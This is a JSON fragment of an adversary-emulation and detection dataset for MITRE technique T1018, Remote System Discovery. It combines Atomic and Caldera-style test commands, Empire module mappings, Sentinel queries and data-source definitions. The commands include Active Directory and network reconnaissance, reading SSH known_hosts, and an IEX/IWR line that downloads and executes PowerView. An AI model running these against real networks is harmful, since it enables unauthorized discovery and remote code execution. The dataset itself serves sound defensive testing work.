"auto_generated_guid": "64ede6ac-b57a-41c2-a7d1-32c6cd35397d", + "description": "The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.\nUpon successful execution a listing of computers will output with their paths in AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n" + } + }, + { + "name": "Get-DomainController with PowerView", + "auto_generated_guid": "b9d2e8ca-5520-4737-8076-4f08913da2c4", + "description": "Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "name": "powershell" + } + }, + { + "name": "Get-wmiobject to Enumerate Domain Controllers", + "auto_generated_guid": "e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad", + "description": "The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.\nUpon successful execution a listing of Systems from AD will output with their paths.\nReference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "get-wmiobject -class ds_computer -namespace root\\directory\\ldap" + } + } + ] + }, + { + 
"id": "0360ede1-3c28-48d3-a6ef-6e98f562c5af", + "name": "GetComputers (Alice)", + "description": "Get a list of all computers in a domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "13379ae1-d20e-4162-91f8-320d78a35e7f", + "name": "Discover local hosts", + "description": "Use PowerView to query the Active Directory server for a list of computers in the Domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "parsers": { + "plugins.stockpile.app.parsers.gdomain": [ + { + "source": "remote.host.fqdn" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "26c8b8b5-7b5b-4de1-a128-7d37fb14f517", + "name": "Discover domain controller", + "description": "Identify the remote domain controllers", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "cmd": { + "command": "nltest /dsgetdc:%USERDOMAIN%\n" + }, + "psh": { + "command": "nltest /dsgetdc:$env:USERDOMAIN\n" + } + } + } + }, + { + "id": "5f77ecf9-613f-4863-8d2f-ed6b447a4633", + "name": "Parse SSH known_hosts", + "description": "View the known_hosts file", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cat ~/.ssh/known_hosts\n" + } + }, + "linux": { + "sh": { + "command": "cat ~/.ssh/known_hosts\n" + } + } + } + }, + { + "id": "85341c8c-4ecb-4579-8f53-43e3e91d7617", + "name": "Collect ARP details", + "description": "Locate all active IP and FQDNs on the network", + "tactic": 
"discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + }, + "windows": { + "psh,cmd": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + } + } + }, + { + "id": "ce485320-41a4-42e8-a510-f5a8fe96a644", + "name": "Discover Mail Server", + "description": "Identify the organizations mail server", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + }, + "darwin": { + "sh": { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "(nslookup -querytype=mx #{target.org.domain}. 
| Select-String -pattern 'mail' | Out-String).Trim()\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + } + } + }, + { + "id": "fa4ed735-7006-4451-a578-b516f80e559f", + "name": "Reverse nslookup IP", + "description": "Find hostname of remote IP in domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nslookup #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.reverse_nslookup": [ + { + "source": "remote.host.fqdn", + "edge": "has_ip", + "target": "remote.host.ip" + } + ] + } + } + } + } + }, + { + "id": "fdf8bf36-797f-4157-805b-fe7c1c6fc903", + "name": "Find Hostname", + "description": "Find hostname of remote host", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nbtstat -A #{remote.host.ip}" + } + } + } + }, + { + "chain_id": "100165", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "view /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "remote_discovery", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "chain_id": "100166", + "os": "windows", + "parent_process": "qwinsta.exe", + "commandline_string": "/server:", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "remote_discovery", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "chain_id": "100167", + "os": "windows", + "parent_process": "installutil.exe", + "commandline_string": "/logfile= /LogToConsole=false /U *.dll", + "sub_process_1": "", + 
"sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_controller", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_controller\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_policy", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_policy\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_trust", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_trust\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_forest", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_forest\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_forest_domain", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_forest_domain\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_site", + "ATT&CK Technique #1": 
"T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_site\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/reverse_dns", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/reverse_dns\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_computers", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_computers\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_domaincontrollers", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_domaincontrollers\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/gethostbyname", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/gethostbyname\": [\"T1018\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"net.exe\"or process_path contains \"ping.exe\")and (process_command_line contains \"view\"or process_command_line contains \"ping\")", + "name": "Remote System Discovery Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (process_path contains \"net.exe\"or process_path contains \"ping.exe\")and (process_command_line contains \"view\"or process_command_line contains 
\"ping\")", + "name": "Remote System Discovery Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Win Firewall" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + 